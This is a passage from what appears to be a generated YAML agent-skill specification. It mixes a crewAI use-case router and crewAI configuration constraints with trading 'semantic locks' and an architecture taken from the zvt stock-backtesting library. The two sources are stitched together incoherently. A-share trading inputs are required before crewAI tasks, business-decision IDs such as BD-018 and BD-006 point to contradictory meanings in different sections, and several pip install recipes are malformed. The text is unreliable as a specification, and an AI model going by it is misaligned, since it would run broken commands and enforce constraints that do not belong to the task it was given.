  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Marketing Strategy Multi-agent
    positive_terms:
    - marketing
    - strategy
    - multi-agent
    - campaign
    data_domain: mixed
    negative_terms:
    - content (overlaps UC-005)
    - email (overlaps UC-006)
    ambiguity_question: Is the workflow channel-agnostic strategy planning, or content production? Strategy → UC-001; production
      pipeline → UC-005.
  - uc_id: UC-002
    name: Job Posting Generation
    positive_terms:
    - recruitment
    - jd generation
    - hiring
    - HR automation
    data_domain: domain_specific
    negative_terms:
    - executive search (needs human-in-the-loop final decision)
  - uc_id: UC-003
    name: Game Builder Crew
    positive_terms:
    - code generation
    - game development
    - multi-agent coding
    data_domain: technical_demo
    negative_terms:
    - coding agent (overlaps with non-game code generation)
    ambiguity_question: Is the goal a game specifically, or general code generation? Game → UC-003; general → see docs/en/learn/coding-agents.mdx
      (extension example).
  - uc_id: UC-004
    name: Match Profile to Positions
    positive_terms:
    - cv matching
    - vector search
    - candidate sourcing
    data_domain: domain_specific
    negative_terms:
    - simple keyword search (overkill)
  - uc_id: UC-005
    name: Content Creator Flow
    positive_terms:
    - content production
    - flow
    - multi-crew
    - routing
    data_domain: mixed
    negative_terms:
    - marketing strategy (overlaps UC-001)
    - hierarchical mode (overlaps UC-007)
    ambiguity_question: Is the workflow event-driven with conditional branches (use Flow → UC-005), or a linear pipeline (use
      Process.sequential → UC-008), or manager-routed (use Process.hierarchical → UC-007)?
  - uc_id: UC-006
    name: Email Auto Responder Flow
    positive_terms:
    - email
    - automation
    - monitoring
    - long-running listener
    data_domain: behavioral
    negative_terms:
    - one-shot batch processing (use kickoff_for_each instead)
  - uc_id: UC-007
    name: Hierarchical Process Crew (manager_llm-routed)
    positive_terms:
    - manager
    - hierarchical
    - delegation
    - dynamic routing
    data_domain: mixed
    negative_terms:
    - sequential (overlaps UC-008)
    ambiguity_question: Need dynamic dispatch decided by an LLM? hierarchical → UC-007. Need static pipeline order? sequential
      → UC-008.
  - uc_id: UC-008
    name: Sequential Process Crew (Quickstart)
    positive_terms:
    - sequential
    - pipeline
    - research-and-report
    - quickstart
    data_domain: mixed
    negative_terms:
    - hierarchical (overlaps UC-007)
    ambiguity_question: see UC-007
  - uc_id: UC-009
    name: Conditional Tasks
    positive_terms:
    - conditional
    - branching
    - if/else task
    data_domain: mixed
    negative_terms:
    - first task slot (ConditionalTask cannot be first)
    - async slot (ConditionalTask cannot be async)
  - uc_id: UC-010
    name: Async Kickoff for Each (batch / parallel)
    positive_terms:
    - batch
    - async
    - parallel inputs
    - kickoff_for_each
    data_domain: mixed
    negative_terms:
    - tasks that must observe each others' outputs (use Process.sequential within one Crew instead)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 27
    fatal_constraints_count: 5
    non_fatal_constraints_count: 51
    use_cases_count: 10
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 7 source groups: agent_setup(6),
        crew_initialization(2), cross_cutting(6), memory_unified(4), process_selection(3), task_execution(5), and 1 more.'
      key_decisions: 27 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-005
      type: B/BA
      summary: Default Agent.max_iter=25
    - id: BD-006
      type: B
      summary: On hitting max_iter, framework fires ONE additional LLM call with the i18n force_final_answer template, forcing
        the LLM to emit a final answer (total = max_iter+1 LLM calls in this branch)
    - id: BD-013
      type: B
      summary: Tool repeated-usage detection only compares against last_used_tool (single-slot)
    - id: BD-019
      type: T/B
      summary: LLM provider routing — native SDK preferred for 5 providers, LiteLLM is fallback; missing LiteLLM raises ImportError
        pointing to uv add 'crewai[litellm]'
    - id: BD-020
      type: T
      summary: 76 @abstractmethod across 20+ base classes provide extension surface (RAG, knowledge storage, state providers,
        CLI auth, MCP transports, agent variants)
    - id: BD-021
      type: B
      summary: Tool-loop selection (_invoke_loop) is a silent feature-detection dispatcher — no log / warning / event when
        ReAct fallback is taken
    - id: BD-002
      type: B
      summary: Sequential mode requires every Task to declare an explicit agent at construction
    - id: BD-018
      type: B
      summary: Crew structural rules — at most one async task at the end; async task may not depend on consecutive async tasks;
        ConditionalTask can neither be first nor async
    - id: BD-022
      type: missing
      summary: No multi-agent consensus / quorum / voting topology in core (Process enum has TODO comment for consensual but
        no implementation)
    - id: BD-023
      type: missing
      summary: No typed contract between manager and worker agents in hierarchical mode — delegation passes string prompts
    - id: BD-024
      type: missing
      summary: step_callback exception isolation is partial — single-step callback raise can corrupt the surrounding task
    - id: BD-025
      type: missing
      summary: Cost tracking only counts tokens — completion_cost field is defined but never populated; dollar cost requires
        user-supplied LiteLLM cost callback
    - id: BD-026
      type: missing
      summary: Memory composite-score weights (0.3 / 0.5 / 0.2) and half-life (30 days) lack sensitivity analysis or recommendation
        per use case
    - id: BD-027
      type: missing
      summary: No deepcopy / immutable-clone helper for long-lived Crew instances; users reusing a Crew across kickoffs inherit
        any prior mutations (e.g. manager mutate-then-raise in BD-004)
    - id: BD-008
      type: B/M
      summary: Memory hardcoded defaults — LLM=gpt-4o-mini, storage=lancedb, embedder= OpenAIEmbeddingFunction
    - id: BD-009
      type: M/BA
      summary: Memory composite relevance weights — recency=0.3, semantic=0.5, importance=0.2
    - id: BD-010
      type: M
      summary: Recency uses exponential decay with half-life 30 days
    - id: BD-011
      type: M/BA
      summary: Memory recall confidence routing — confidence_threshold_high=0.8 (early return), confidence_threshold_low=0.5
        (trigger LLM exploration), exploration_budget=1
    - id: BD-001
      type: B
      summary: Process enum ships two production values — sequential and hierarchical — with a TODO comment for consensual
        that has not been implemented in this commit
    - id: BD-003
      type: B/DK
      summary: Hierarchical-mode auto-built manager pulls role/goal/backstory from the English i18n file ("Crew Manager")
    - id: BD-004
      type: B
      summary: User-supplied manager_agent must NOT carry tools — framework mutates manager.tools=[] AND manager.allow_delegation=True
        before raising Exception
    - id: BD-007
      type: B/BA
      summary: Default Task.guardrail_max_retries=3
    - id: BD-014
      type: B/BA
      summary: Default task.context = NOT_SPECIFIED triggers implicit aggregation of ALL preceding task outputs
    - id: BD-015
      type: B/BA
      summary: aggregate_raw_outputs_from_task_outputs has NO token cap, NO truncation, NO summarization
    - id: BD-016
      type: M/B
      summary: Context-overflow recovery uses chunked summarization AFTER the LLM raises
    - id: BD-017
      type: T/B
      summary: kickoff_async is asyncio.to_thread(self.kickoff, ...) (thread-wrap), akickoff is the native async path
    - id: BD-012
      type: B
      summary: Telemetry is opt-out — auto-init at import time unless one of three ENVs is set; payload layered (skeleton
        always, business context when share_crew=True)
resources:
  packages:
  - name: crewAI (lib/crewai/src/crewai)
    version_pin: latest
  - name: crewai-tools (companion package)
    version_pin: latest
  - name: pydantic v2
    version_pin: latest
  - name: opentelemetry-sdk + opentelemetry-exporter-otlp
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install crewAI (lib/crewai/src/crewai)
    - python3 -m pip install crewai-tools (companion package)
    - python3 -m pip install pydantic v2
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: crewai-C-001
    when: When constructing a Crew with 5 or more sequential tasks and verbose intermediate outputs
    action: Always set task.context = [task1, task2, ...] explicitly to declare which prior outputs are needed, OR install
      a task callback that summarizes raw output before the next task consumes it. Do not rely on the default aggregation
      path for chains beyond ~4 tasks. Verify by inspecting agent prompt token counts at the boundary task.
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-002
    when: When configuring an Agent with 2 or more tools where the model could plausibly toggle between them
    action: On every tool instance reachable by an agent with >=2 tools, set max_usage_count to a budget you can afford (e.g.
      5-10 per kickoff). Additionally hook step_callback to maintain a per-tool counter and abort the loop when an A→B→A pattern
      persists for >=2 cycles. Do NOT rely on _check_tool_repeated_usage to catch oscillation.
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-003
    when: When deploying any application that imports crewai in an environment with privacy / compliance / GDPR / SOC2 / data-residency
      requirements
    action: Set CREWAI_DISABLE_TELEMETRY=true (or one of the equivalents) BEFORE any process imports crewai — set it in .env,
      docker-compose, Kubernetes manifests, CI workflows, and developer onboarding scripts. Do NOT rely on assuming SDK frameworks
      are silent. Audit by running with logging enabled and confirming no OTLP exporter init log appears.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-004
    when: When configuring share_crew at Crew construction in any non-development environment
    action: Keep share_crew=False (the default). If telemetry must be enabled at all, ensure share_crew is explicitly False
      AND validate via a unit test that no agent role/goal/backstory string appears in outgoing OTLP payloads. Treat share_crew=True
      as requiring legal review even on internal tooling.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-005
    when: When implementing a custom BaseLLM subclass for a non-native LLM provider (anything beyond OpenAI/Anthropic/Azure/Bedrock/Gemini)
    action: (1) Override supports_function_calling() in your BaseLLM subclass to return True only when your provider actually
      supports OpenAI-compatible tool schemas; default-False inheritance is wrong for any function-calling-capable model.
      (2) Immediately after Crew construction, assert each agent.llm.supports_function_calling() == True (or accept ReAct
      deliberately). (3) Do NOT rely on logs to diagnose ReAct fallback — there are none.
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  regular:
  - id: crewai-C-006
    when: When designing the lifetime of Crew instances in hierarchical mode
    action: (a) Construct a fresh Crew per kickoff in hierarchical mode (cheapest fix). (b) If you must reuse, deepcopy the
      Crew (or rebuild manager_agent from a known-good template) BEFORE every kickoff. (c) NEVER swallow exceptions from kickoff
      and reuse the same instance. (d) Validate manager_agent.tools=[] at construction time (before passing to Crew) so the
      framework never enters the mutate-then-raise path.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-007
    when: When estimating LLM cost per agent or setting max_iter for cost-sensitive deployments
    action: Use (max_iter + 1) * per_call_cost as your worst-case agent budget formula. Lower max_iter to a value matched
      to your task complexity (e.g. 10 for simple research, 5 for one-shot extraction). Always pair the lower max_iter with
      per-tool max_usage_count (see crewai-C-002) so the cap is hit by progress, not oscillation.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-008
    when: When choosing process topology for a multi-agent system that needs robustness via consensus, voting, or quorum
    action: For decision-robustness use cases (legal review, financial trading, medical diagnosis), build a consensus topology
      on top of Flow with @start/@listen/@router decorators rather than waiting for Process.consensual. Do NOT pass Process.consensual
      or any other enum value — it will reach NotImplementedError. Hierarchical mode's single-manager LLM dispatch is NOT
      a consensus mechanism.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-009
    when: When constructing Tasks for a Process.sequential Crew
    action: For sequential mode, set task.agent on every Task at construction. If routing must be dynamic, choose Process.hierarchical
      and provide either manager_llm OR manager_agent (mutually exclusive — see crewai-C-010). Do not attempt to leave task.agent
      empty hoping the framework will auto-assign.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-010
    when: When constructing a hierarchical Crew with a custom manager_agent
    action: 'Decide explicitly: (a) auto-build manager → pass manager_llm only, leave manager_agent=None, accept the i18n
      English ''Crew Manager'' role. (b) custom manager → pass a manager_agent constructed with tools=[] and DO NOT pass manager_llm
      (it will be ignored). Validate manager_agent.tools is [] BEFORE handing the agent to Crew.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-011
    when: When choosing the async entrypoint for crewAI in a high-concurrency host (FastAPI, asyncio web server, batch dispatcher)
    action: (a) Use akickoff for high-concurrency workloads where every LLM and tool client supports async-native I/O. (b)
      Use kickoff_async only as a bridge for legacy sync code paths and only when concurrent kickoff count <= thread pool
      size. (c) Verify by load-testing — if throughput plateaus at ~32 concurrent kickoffs regardless of CPU/network, you
      are thread-pool-bound, not LLM-bound.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-012
    when: When designing a multi-task workflow that involves parallelism, branching, or conditional skipping
    action: 'Map your workflow to one of: (a) linear sequential pipeline → Crew(process=Process.sequential). (b) manager-routed
      dispatch → Crew(process=Process.hierarchical). (c) parallel branches / conditional fan-out / event-driven → Flow with
      @start/@listen/@router. ConditionalTask is for a single in-pipeline skip, not a DAG primitive. Validate task list against
      the 3 rules at construction time.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-013
    when: When designing a hierarchical Crew where manager and worker need to exchange structured (non-prose) data
    action: (a) Serialize structured payloads to JSON before delegation, and validate-then-parse on the worker side using
      your own Pydantic model. (b) Accept that the round-trip can lose typing guarantees — log a checksum of the round-trip
      data on both sides during dev. (c) For domains where structured contracts are mandatory (finance, medical), consider
      Flow with explicit typed events instead of hierarchical Crew.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-014
    when: When wiring step_callback for observability, logging, or external metrics integration
    action: Wrap the entire step_callback body in try/except Exception. Inside the except, log to a fallback logger or no-op
      silently — never re-raise. Test the safe pattern by deliberately raising in the callback during dev and verifying the
      crew still completes. Do NOT assume the framework isolates callback exceptions.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-015
    when: When building cost monitoring or budget alerts for crewAI deployments
    action: (a) Wire LiteLLM's cost callback (`litellm.success_callback = ['callback_func']`) at the LiteLLM level for non-native
      providers. (b) For native providers, maintain your own per-model rate table and multiply against TokenCalcHandler counts
      after each kickoff. (c) Do NOT read llm.completion_cost — it will always be its default value. (d) Account for the +1
      force_final_answer call (see crewai-C-007) in your projection.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-016
    when: When creating a custom Agent subclass (or any other base class subclass — RAG client, knowledge storage, state provider,
      MCP transport, CLI auth provider)
    action: 'Before subclassing, run `grep -rn ''@abstractmethod'' lib/crewai/src/crewai/<your-base-path>` and implement EVERY
      method listed. For BaseAgent specifically: execute_task, aexecute_task, create_agent_executor, get_delegation_tools,
      get_platform_tools (CrewAI Platform — return [] if unused), get_mcp_tools (Model Context Protocol — return [] if unused).
      Densest base classes: rag/core/base_client.py (12), state/provider/core.py (6), knowledge/storage/base_knowledge_storage.py
      (6), cli/authentication/providers/base_provider.py (6), mcp/transports/base.py (5).'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-017
    when: When choosing or switching the LLM provider for a Crew (Agent.llm or manager_llm) in production
    action: '(a) Standardize on native providers (OpenAI/Anthropic/Azure/Bedrock/Gemini) when possible — richer features,
      lower latency, no extra dependency. (b) For other providers: install ''crewai[litellm]'' explicitly in production requirements;
      surface ImportError early in startup tests. (c) When switching providers: re-run a regression suite covering function-calling
      output shape, streaming behavior, cost calculation, retry semantics. (d) Document the chosen provider and routing path.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-018
    when: When enabling Memory in a deployment with vendor-lock, privacy, data-residency, or cost constraints
    action: 'Pass an explicit Memory(...) instance with: llm= (your LLM provider), storage= (''qdrant'' or your custom storage),
      embedder= (your embedder factory). Do NOT rely on memory=True. After any embedder switch on existing data, run a re-index
      job — the old vectors are not portable. Document the chosen providers in your wrapper.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-019
    when: When reading legacy crewAI documentation or migrating Memory code from older versions
    action: Replace any ShortTermMemory / LongTermMemory / EntityMemory imports with `from crewai import Memory, MemoryScope,
      MemorySlice` (exported at __init__.py:47-48 / :54). Replace three-tier writes with Memory.remember(...) using MemoryScope
      to namespace. Replace cross-tier filters with MemorySlice. Read RecallFlow source if you need to understand adaptive-depth
      recall behavior.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-020
    when: When using Memory in a domain whose relevance horizon differs significantly from 30 days
    action: '(a) Identify your domain''s effective relevance horizon: legal cases 90+ days, medical research years, breaking
      news 7 days. (b) Pass a custom Memory(...) instance with recency_weight / semantic_weight / importance_weight / recency_half_life_days
      overridden to match. (c) Validate against a sample query set with known relevance ground truth before production rollout.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-021
    when: When tuning Memory recall quality or noticing high LLM call volume from RecallFlow
    action: '(a) Profile a representative query set: log how many recalls fall into [<0.5, 0.5-0.8, >=0.8] composite-score
      bands. (b) If many fall <0.5, the exploration step fires every time — raising exploration_budget linearly multiplies
      LLM cost. Consider switching to a higher-quality embedder first. (c) If many fall >0.8 the LLM is rarely engaged — that''s
      fine; default behavior. (d) For cost-sensitive deployments, lower confidence_threshold_low (e.g. 0.3) to suppress exploration
      entirely.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: crewai-C-022
    when: When customizing Memory persistence behavior (e.g. swapping to a queue-based async writer or a different executor)
    action: (1) Keep the single-worker semantic (Memory writes are not safe for concurrent fan-out without external locks).
      (2) Provide a drain_writes equivalent that blocks until ALL pending writes complete. (3) Hook drain into the Crew kickoff
      finally block (or its async equivalent). (4) Test by writing then reading immediately after kickoff returns — must see
      the write.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-023
    when: When configuring telemetry disable in containerized or scripted environments
    action: Set CREWAI_DISABLE_TELEMETRY=true in (a) Dockerfile ENV directive, (b) docker-compose service environment, (c)
      Kubernetes pod env, (d) CI workflow env block, (e) shell rc files for developers. Verify by importing crewai then immediately
      calling `from crewai.telemetry import Telemetry; assert not Telemetry().ready` in a startup smoke test. Setting `os.environ['CREWAI_DISABLE_TELEMETRY']='true'`
      AFTER `import crewai` is too late.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-024
    when: When constructing Crew / Agent / Task instances with kwargs whose names you have not double-checked against the
      model definition
    action: (a) Grep `class Crew\(` / `class Agent\(` / `class Task\(` and read the field list before constructing — never
      copy-paste from old tutorials without verifying field names. (b) For high-stakes deployments wrap construction in a
      helper that validates kwargs against `Crew.model_fields.keys()` (Pydantic v2 API) and raises on unknown keys. (c) Run
      a simple unit test that constructs each model with a deliberate typo ('procoss' instead of 'process') — if the test
      passes, you have NOT enabled extra='forbid' and silent drops are happening.
    severity: medium
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: crewai-C-025
    when: When designing a Task whose output must satisfy strict format / business rules
    action: (a) Define a Pydantic model or callable guardrail that the Task output must pass; pass it as the Task's guardrail.
      (b) Keep guardrail_max_retries=3 (default) — increasing it wastes budget on persistently-failing patterns. (c) Pair
      the deterministic guardrail with task callbacks that log retry rate; high retry rate signals the prompt needs refinement,
      not more retries.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-026
    when: When directing users to 'official examples' or when training a model on the crewAI repo expecting examples/ to be
      present
    action: Reference https://github.com/crewAIInc/crewAI-examples and https://github.com/crewAIInc/crewAI-quickstarts as
      the source of examples. For project scaffolding inside this repo, point to lib/crewai/src/crewai/cli/templates/{crew,flow,tool}
      which the `crewai create` CLI emits. Do not write code that assumes examples/ exists — it will fail.
    severity: low
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-027
    when: When integrating crewAI as a Doramagic-published skill or when scripting agentskills.io / CLAUDE.md generation around
      crewAI
    action: (a) Generate your own SKILL.md / AGENTS.md as the Doramagic skill bundle author — do not copy lib/crewai/src/crewai/cli/templates/crew/AGENTS.md
      as authoritative. (b) When users ask 'where is the AGENTS.md', clarify it is a template the CLI emits, not a top-level
      repo artifact. (c) When auditing repo contents for host-adapter compatibility, verify directory presence by `ls .claude-plugin/
      .cursor-plugin/` (both will fail at this commit).
    severity: low
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-028
    when: When using Memory in workloads where the temporal order between memory creation and query matters (backtesting,
      retrospective audit, time-aware experimentation)
    action: Wrap Memory.recall(...) in your own helper that takes a query_time parameter and post-filters results to those
      with created_at <= query_time. Do this even if you think your queries are 'live' — Memory is shared across kickoffs
      and a long-running session can see writes from concurrent kickoffs. For retrospective backtests, snapshot the entire
      vector store before each scenario.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-029
    when: When designing rollback / audit / time-travel features around Crew kickoffs or Memory state
    action: (a) Snapshot the Memory storage backend (LanceDB file, Qdrant collection) on a schedule and before any high-stakes
      write. (b) Maintain your own application-level event log capturing pre-update / pre-delete payloads. (c) For Crew reuse
      across kickoffs, manually deepcopy or reconstruct from a known-good template before each kickoff. (d) Accept that the
      framework itself does not support undo — the work must happen at your application layer.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: crewai-C-030
    when: When choosing between Task.execute_async and Task.aexecute_sync for task-level concurrency
    action: Use Task.aexecute_sync (despite the slightly confusing name — it IS the native-async one, paired with awaitable
      behavior). Reserve Task.execute_async for legacy sync code paths. Verify that the surrounding Crew uses akickoff (not
      kickoff or kickoff_async) — otherwise the async surface is wasted.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: crewai-C-031
    when: When configuring multiple Agents in one Crew with different LLM providers
    action: '(a) Document each Agent''s llm field choice and whether it routes through native or LiteLLM. (b) Build a regression
      test that exercises every (provider × tool-loop × streaming) combination present in your Crew. (c) Beware of provider-specific
